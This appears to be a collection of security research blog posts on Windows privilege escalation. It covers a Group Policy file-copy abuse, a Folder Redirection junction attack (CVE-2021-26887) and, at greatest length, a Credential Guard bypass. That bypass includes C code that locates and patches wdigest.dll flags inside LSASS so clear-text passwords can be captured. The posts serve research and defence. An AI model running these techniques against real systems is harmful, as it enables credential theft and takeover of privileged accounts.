A not-so-common and stupid privilege escalation

By: Decoder
25 April 2022 at 15:26

Some time ago, I was doing a Group Policy assessment in order to check for possible misconfigurations. Apart from running the well-known tools, I usually take a look at the shared SYSVOL policy folder, which is accessible read-only by all domain users and domain computers. At some point, my attention was caught by the “Files.xml” files located under a specific user policy:

These settings were related to the “Files” preference of Group Policy, running under the user configuration.

According to Microsoft this policy allows you to:

In this case, an executable (CleanupTask.exe) was copied from a shared folder to a specific location under the “Program Files” folder (the folder names are invented for confidentiality reasons). The “CleanupTask” executable was run by the Windows Task Scheduler every hour under the SYSTEM user.

The first question was: why was this not running under the computer configuration? Short answer: only some users had this “custom application” installed and needing replacement, so the policy was filtered to a particular user group, in our case the “CustomApp” group, and luckily my user “user1” was a member of this group.

The policy was executed without impersonating the user (so under the SYSTEM context); otherwise, I would have found an entry “userContext=1” in the XML file. This was necessary because a standard user cannot write to %ProgramFiles%.

In addition, the policy was run only once (FilterRunOnce), which prevented the file from being copied again each time the user logged in.

To sum it up, this was the policy configuration from the DC’s perspective:

Now that I had a clear picture of this policy, I took a look at the hidden shared folder… and guess what? It was writable by domain users, a really dangerous misconfiguration…

I think you already got it: I could place an evil executable (reverse shell, add my user to local admins, and so on) in this directory, perform a gpupdate /force, which would copy the evil program to “Program Files\CustomApp\Maintenance”, and then wait for the CleanupTask to execute…

But I still had a problem: this policy was applied only once, and in my case I was already too late… So, no way? Not at all. The evidence that the policy has already been executed is stored in a particular location of the Windows Registry, under the “Current User” hive, which we can modify…

All I needed to do was delete the GUID referring to the filter ID of the group policy, run gpupdate /force again, and perform all the nasty things…
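
As an illustration of that step, here is a minimal C sketch. It assumes the run-once history is kept as values named after the filter GUID under HKCU\Software\Microsoft\Group Policy\Client\RunOnce (the usual location for Group Policy Preferences “apply once” flags); both the key path and the GUID below are placeholders to verify against the target’s Files.xml.

#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")

int wmain(void)
{
    // Hypothetical GUID taken from the FilterRunOnce element of Files.xml
    LPCWSTR filterGuid = L"{11111111-2222-3333-4444-555555555555}";
    HKEY hKey;

    // Assumed location of the per-user GPP run-once history
    if (RegOpenKeyExW(HKEY_CURRENT_USER,
        L"Software\\Microsoft\\Group Policy\\Client\\RunOnce",
        0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS)
    {
        wprintf(L"RunOnce key not found\r\n");
        return 1;
    }

    // Removing the value makes the preference item eligible to run again at the next gpupdate
    if (RegDeleteValueW(hKey, filterGuid) == ERROR_SUCCESS)
        wprintf(L"Run-once flag removed, now run 'gpupdate /force'\r\n");

    RegCloseKey(hKey);
    return 0;
}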

Misconfigurations in Group Policies, especially those involving file operations, can be very dangerous, so publish them only after an extremely careful review 😉

Group Policy Folder Redirection CVE-2021-26887

By: Decoder
27 April 2022 at 17:30

Two years ago (March 2020), I found this sort of “vulnerability” in the Folder Redirection policy and reported it to MSRC. They acknowledged it with CVE-2021-26887, even if they did not really fix the issue (“folder redirection component interacts with the underlying NTFS file system has made this vulnerability particularly challenging to fix”). The proposed solution was reconfiguring Folder Redirection with Offline Files and restricting permissions.

I had completely forgotten about this case until a few days ago, when I came across my report and decided to publish my findings (don’t expect anything very sophisticated).

There is also an “important” update at the end.. so keep on reading 🙂

Summary

If “Folder Redirection” has been enabled via Group Policy and the redirected folders are hosted on a network share, it is possible for a standard user who has access to this file server to access other users’ folders and files (information disclosure) and eventually achieve code execution and privilege escalation.

Prerequisites

  1. A Domain User Group Policy with “Folder Redirection” has to be configured.
  2. A standard local or domain user has to be able to log in on the file server hosting the folder redirection shares (RDP, WinRM, SSH, …).
  3. There have to be domain users who will log on for the first time or will have the Folder Redirection policy applied for the first time.

 

Steps to reproduce

In this example I used three VMs:

  1. Windows Server 2019 acting as Domain Controller
  2. Windows Server 2019 member server acting as File Server
  3. Windows 10 domain-joined client

On the domain controller, I create a “Folder Redirection” policy. In my example, I’m going to use the “Default Domain Policy” and redirect two folders, the user’s “Documents” and “AppData” folders, to a network share located on server “S01”.

The policy can be found in the SYSVOL share of the DCs:

The folder redirection share is accessible via the network path \\S01\users$. The permissions on this folder have been configured on server “S01” according to the Microsoft documentation: https://docs.microsoft.com/en-us/windows-server/storage/folder-redirection/deploy-folder-redirection

In my case, “S01\Users” is the group to which the policy will be applied, because this group also contains the “Domain Users” group.

Each time a domain user logs in to the domain, the Documents and AppData folders (in this case) are saved on the network share. If it is the first time the user logs in, the necessary directories are created under the share with strict permissions:

One could think of creating the necessary directories before the domain user logs in, granting both themselves and the domain user full control, and then accessing this private folder and its data afterwards.

This is not possible because, during the first logon, if the folder already exists, a strict check on ownership and permissions is made, and if they don’t match, the folder will not be used (I verified this with “procmon”).

But if the shared directory has a valid owner and permissions, no further permission checks are made during subsequent logins, and this is a potential security issue.

How can I accomplish this? This is what I will do:

As a standard local/domain user, I log in on the server where the shares are hosted (I know this is not so common…).

I will create a “junction” for a “new” user who has not logged in to the domain yet or has not yet applied the Folder Redirection policy (finding “new” users is a really easy task for a standard domain user, so I won’t explain it). In my case, for example, “domainuser3”.

Now I have to wait for domainuser3 to log in from his Windows 10 client (in my case).

The Folder Redirection policy has been applied and permissions are set on the folders.

But as we can see on the file server S01, my junction point has been followed too; the real location of the folders is here:

Now, all the malicious user “localuser” has to do is wait for domainuser3 to log off, delete the junction, and create the new folders under the original share:

… and then set the permissions (Documents and AppData in our case) so that “Everyone” is granted full control:

Given that in my case the “AppData” folder is also redirected, we could place a “malicious” program in the user’s Startup folder, which will then be executed at login (for example, a reverse shell).

At this point, “localuser” has to wait for the next login of “domainuser3”…

… and will get a shell impersonating domainuser3 (imagine if it were a highly privileged user):

Of course, he will be able to access the Documents folder with full control permissions:

Conclusions:

Even if the pre-conditions are not so “common”, this vulnerability could easily lead to information disclosure and EoP.

Update

So much for the report; but when I re-read the mitigations suggested by MS, something was not clear. The first time the user logs in, the necessary security checks are performed, so why did they say it was not possible to fix? All they had to do was perform these checks not only at the first logon, right?

My best guess was that if the profile, or more precisely the registry entry HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\<user_sid>, is not found, the checks are performed; otherwise, they are skipped.

A quick test demonstrated that I was right: after the first logon, I deleted the registry entry and the security checks were performed again.
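
For reference, a minimal sketch of that test (it must run with administrative rights on the machine used for the test, and the SID below is a placeholder):

#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")

int wmain(void)
{
    // Placeholder SID of the test user (find it e.g. with "whoami /user")
    LPCWSTR profileKey =
        L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\"
        L"S-1-5-21-1111111111-2222222222-3333333333-1105";

    // Deleting the subtree removes the evidence that the profile already exists,
    // so the Folder Redirection security checks run again at the next logon
    LSTATUS status = RegDeleteTreeW(HKEY_LOCAL_MACHINE, profileKey);
    wprintf(L"RegDeleteTreeW returned %ld\r\n", (long)status);
    return status == ERROR_SUCCESS ? 0 : 1;
}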

Maybe the answer is in fdeploy.dll, for example in CEngine::_ProcessFRPolicy; I need to investigate further… or maybe I’m missing something, but this exercise is left to the reader.

That’s all 😉

Revisiting a Credential Guard Bypass

By: itm4n
23 May 2022 at 00:00

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.

Background

As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

Source: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works

Though, in August 2020, an article was posted on Team Hydra’s blog with the following title: Bypassing Credential Guard. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the too well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their names are rather self-explanatory: the first one holds the state of Credential Guard within the module (is it enabled or not?), while the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard were not enabled and the system were configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of the users’ password when the next authentication occurs. In other words, you won’t be able to access previously stored credentials, but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address to calculate their absolute address. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.
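
For context, once the absolute addresses are known, the patching step boils down to a couple of WriteProcessMemory calls. Below is a minimal sketch (error handling and privilege handling, such as enabling SeDebugPrivilege, are omitted); the PID, the module base and the two offsets are assumed to have been obtained beforehand.

#include <windows.h>

// Flip both flags in the target lsass.exe process.
// pWdigestBase is the base address of wdigest.dll inside lsass.exe; the two
// offsets are relative to that base (hardcoded or resolved at run-time).
BOOL PatchWdigest(DWORD dwLsassPid, PBYTE pWdigestBase, DWORD dwOffUseLogonCredential, DWORD dwOffIsCredGuardEnabled)
{
    DWORD dwOne = 1, dwZero = 0;
    HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwLsassPid);
    if (!hProcess)
        return FALSE;

    // g_fParameter_UseLogonCredential = 1 -> keep clear-text passwords in memory
    BOOL bOk = WriteProcessMemory(hProcess, pWdigestBase + dwOffUseLogonCredential, &dwOne, sizeof(dwOne), NULL);
    // g_IsCredGuardEnabled = 0 -> pretend Credential Guard is not enabled
    bOk = bOk && WriteProcessMemory(hProcess, pWdigestBase + dwOffIsCredGuardEnabled, &dwZero, sizeof(dwZero), NULL);

    CloseHandle(hProcess);
    return bOk;
}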

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan

If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols and analyze the whole.

Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, nothing surprising about this.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.

So, searching directly in the .data section is definitely not the way to go. There is a better approach: rather than searching for these values, we can search for cross-references! The reason these global variables even exist in the first place is that they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.

Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.

Two cross-references immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.
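
For instance, resolving the address of SpInitialize in our own process only takes a couple of calls (a trivial sketch):

#include <windows.h>
#include <stdio.h>

int wmain(void)
{
    // wdigest.dll exports SpInitialize, so we can resolve it like any other export
    HMODULE hWdigest = LoadLibraryW(L"wdigest.dll");
    if (hWdigest) {
        FARPROC pSpInitialize = GetProcAddress(hWdigest, "SpInitialize");
        wprintf(L"SpInitialize is at 0x%p\r\n", (PVOID)pSpInitialize);
        FreeLibrary(hWdigest);
    }
    return 0;
}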

We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2
; ...
test byte ptr [r15 + 0x4],0x20
cmovnz eax,esi
mov dword ptr [g_IsCredGuardEnabled],eax

First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, the byte at offset 0x04 from this pointer is dereferenced and tested (a bitwise AND) against the value 0x20.

The function SpInitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS Spinitializefn(
  [in] ULONG_PTR PackageId,
  [in] PSECPKG_PARAMETERS Parameters,
  [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
)

The structure SECPKG_PARAMETERS is documented here. The attribute located at the offset 0x04 in the structure (c.f. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {
  ULONG          Version;
  ULONG          MachineState;
  ULONG          SetupMode;
  PSID           DomainSid;
  UNICODE_STRING DomainName;
  UNICODE_STRING DnsDomainName;
  GUID           DomainGuid;
} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute but it does not tell us what flag corresponds to the value 0x20. However it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. If so, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED               0x01
#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED        0x02
#define SECPKG_STATE_DOMAIN_CONTROLLER                  0x04
#define SECPKG_STATE_WORKSTATION                        0x08
#define SECPKG_STATE_STANDALONE                         0x10
#define SECPKG_STATE_CRED_ISOLATION_ENABLED             0x20
#define SECPKG_STATE_RESERVED_1                   0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded in RAX, that’s a rather common operation and we cannot rely on the fact that the compiler will use the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again this is a generic operation so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions but we cannot rely on the fact that the compiler will produce the same code every time here either.

; Before the call to RegQueryValueExW
; 180003180 48 8d 05 2d 30 03 00
lea     rax,[g_fParameter_UseLogonCredential]
; ...
; 18000318e 48 89 44 24 20
mov     qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential
; After the call to RegQueryValueExW
; 1800031b1 44 89 25 fc 2f 03 00
mov     dword ptr [g_fParameter_UseLogonCredential],r12d
; Test on param_2->MachineState
; 18000299b 41 f6 47 04 20
test    byte ptr [r15 + 0x4],0x20
; 1800029a0 0f 45 c6
cmovnz  eax,esi
; 1800029a3 89 05 5f 32 03 00
mov     dword ptr [g_IsCredGuardEnabled],eax

We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.

The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00
cmp     dword ptr [g_fParameter_UseLogonCredential],ebx
; 18000183f 8b 05 c3 43 03 00
mov     eax,dword ptr [g_IsCredGuardEnabled]
; 180001845 0f 85 9c 77 00 00
jnz     LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp    dword ptr [rip + 0x34975],ebx  ; 39 1d 75 49 03 00
mov    eax,dword ptr [rip + 0x343c3]  ; 8b 05 c3 43 03 00
jnz    0x77ae                         ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction to compare a 16 or 32 bit register against a 16 or 32 bit value in another register or a memory location. Then, 1d represents the source register (EBX in this case). Finally, 75 49 03 00 is the little endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way although it is a MOV instruction.

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

No need to say that this is not great but there is still room for improvement so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, it is not completely relevant because the PE file also has uninitialized data that could contain this pattern once it is loaded. Though, to address this issue, we can very well limit the search to the .text section because it is not subject to modifications at run-time.

There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes The Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a link whenever the file is available for download. Kudos to @m417z for this tool, this is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.

It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern

We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    // ...
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    // ...
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate over the section headers that are located after the NT headers, until we find the one with the name .text.

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    // ...
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    // ...
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
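
Here is a rough sketch of locating the .text section header by reading the headers straight from the file (error handling trimmed; it assumes a standard 64-bit PE such as wdigest.dll):

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", GENERIC_READ, ...);
IMAGE_DOS_HEADER DosHeader;
IMAGE_NT_HEADERS64 NtHeaders;
IMAGE_SECTION_HEADER SectionHeader;
DWORD dwBytesRead, i;
BOOL bFound = FALSE;

// Read the DOS header, then jump to the NT headers using e_lfanew
SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
ReadFile(hFile, &DosHeader, sizeof(DosHeader), &dwBytesRead, NULL);
SetFilePointer(hFile, DosHeader.e_lfanew, NULL, FILE_BEGIN);
ReadFile(hFile, &NtHeaders, sizeof(NtHeaders), &dwBytesRead, NULL);

// The section headers immediately follow the optional header
SetFilePointer(hFile,
    DosHeader.e_lfanew + FIELD_OFFSET(IMAGE_NT_HEADERS64, OptionalHeader) + NtHeaders.FileHeader.SizeOfOptionalHeader,
    NULL, FILE_BEGIN);

for (i = 0; i < NtHeaders.FileHeader.NumberOfSections; i++) {
    ReadFile(hFile, &SectionHeader, sizeof(SectionHeader), &dwBytesRead, NULL);
    if (strncmp((char*)SectionHeader.Name, ".text", IMAGE_SIZEOF_SHORT_NAME) == 0) {
        bFound = TRUE;
        break;
    }
}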

Once we have identified the section header corresponding to the .text section, we know its size and offset in the file. With that knowledge, we can invoke SetFilePointer to move the file pointer PointerToRawData bytes from the beginning of the file and read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);
PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);
SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);
ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, NULL, NULL);

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00
j = 0;
while (j + 12 <= SectionHeader.SizeOfRawData) {
  if (pTextSection[j] == 0x39) {
    if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
      wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);
    }
  }
  j++;
}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.

Just for testing purposes and out of curiosity, I also tried several variants of the pattern to sort of see how efficient it was. Surprisingly, the count dropped very quickly with only two occurrences for the variant #2.

Variant   Pattern                               Occurrences
1         39 .. .. .. .. 00 .. .. .. .. .. ..   98
2         39 .. .. .. .. 00 8b .. .. .. .. ..   2
3         39 .. .. .. .. 00 8b .. .. .. .. 00   1

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp    dword ptr [rip + 0x34975], ebx   ; 39 1D   75 49 03 00
mov    eax, dword ptr [rip + 0x343c3]   ; 8B 05   C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am not used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code, but instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));
RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));
dwUseLogonCredentialOffset += 6 + dwCodeOffset;
dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);
wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target lsass.exe process. Of course, this part was already implemented in the original PoC, using the following method (a rough sketch is shown after the list):

  1. Open the lsass.exe process with PROCESS_ALL_ACCESS.
  2. List the loaded modules with EnumProcessModules.
  3. For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.
  4. If so, call GetModuleInformation to get its base address.
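
Here is a condensed sketch of that enumeration approach (not necessarily identical to the original PoC code; query and read rights are enough for the enumeration itself):

#include <windows.h>
#include <psapi.h>
#include <wchar.h>
#include <stdio.h>
#pragma comment(lib, "psapi.lib")

// Returns the base address of wdigest.dll inside the process identified by dwPid (NULL on failure)
PVOID FindWdigestBase(DWORD dwPid)
{
    HMODULE hMods[1024];
    DWORD cbNeeded;
    PVOID pBase = NULL;

    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwPid);
    if (!hProcess)
        return NULL;

    if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) {
        for (DWORD i = 0; i < cbNeeded / sizeof(HMODULE); i++) {
            WCHAR szModName[MAX_PATH];
            if (GetModuleFileNameExW(hProcess, hMods[i], szModName, MAX_PATH)
                && wcsstr(szModName, L"wdigest.dll")) {
                MODULEINFO mi;
                if (GetModuleInformation(hProcess, hMods[i], &mi, sizeof(mi)))
                    pBase = mi.lpBaseOfDll;
                break;
            }
        }
    }
    CloseHandle(hProcess);
    return pBase;
}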

Ideally, we would like to interact with LSASS as little as possible, but since we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.

The key thing is that the base address of a module is determined when it is first loaded. Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return a HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;
if ((hModule = LoadLibraryW(L"wdigest.dll")))
{
  wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);
  FreeLibrary(hModule);
}

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08
Base address of wdigest.dll: 0x00007FFEE32B0000
Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4
Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08

We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is, as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets and therefore running code that is version-independent is attractive. However, it might also be a bit riskier as pattern matching is not an exact science. To address this, I implemented a safeguard which consists in ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only risk I see is that Microsoft could slightly change the implementation so that my pattern just no longer works.

As for defenders, enabling Credential Guard should not keep you from enabling LSA Protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires running code in the kernel or using a sophisticated userland bypass, both of which create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.

Links & Resources

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

By: itm4n
20 February 2021 at 23:00
A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share. In the Previous Episode… Before we begin, here is a brief s...

